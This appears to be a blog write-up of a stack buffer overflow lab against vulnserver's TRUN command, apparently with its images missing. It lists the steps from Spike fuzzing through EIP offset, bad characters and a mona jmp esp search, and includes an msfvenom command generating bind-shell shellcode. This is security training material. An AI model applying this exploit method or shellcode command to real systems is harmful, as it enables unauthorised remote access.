Vulnserver Buffer Overflow — TRUN

What is vulnserver?

Tools used

  • Immunity debugger
  • Spike
  • nmap
  • Netcat
  • mona.py
  • Microsoft Code
Default port used by vulnserver
nc -nv 192.168.173.130 9999
Initial connection
TRUN input
Attach vulnserver to Immunity Debugger
s_readline();
s_string("TRUN ");
s_string_variable("COMMAND");
generic_send_tcp 192.168.173.130 9999 buff.spk 0 0
Fuzzing stops
Exploit 1
Crash replicated
Generate 5000 character string
Exploit 2
EIP overwritten with 6F43376F
Metasploit Pattern Offset
Mona Findmsp
Exploit 3
Exploit 3 results
!mona bytearray
Exploit 4
No more bad characters
!mona jmp -r esp -m "essfunc.dll"
jmp esp for essfunc.dll
msfvenom -p windows/shell_bind_tcp EXITFUNC=thread -b "\x00" -f c
  • The JMP ESP from the DLL identified
  • A nopsled before the shellcode (24 NOP instructions)
Shellcode
Exploit 5
Shellz!

Brenton Swanepoel

Excited about OSINT, threat hunting and the general breaking of things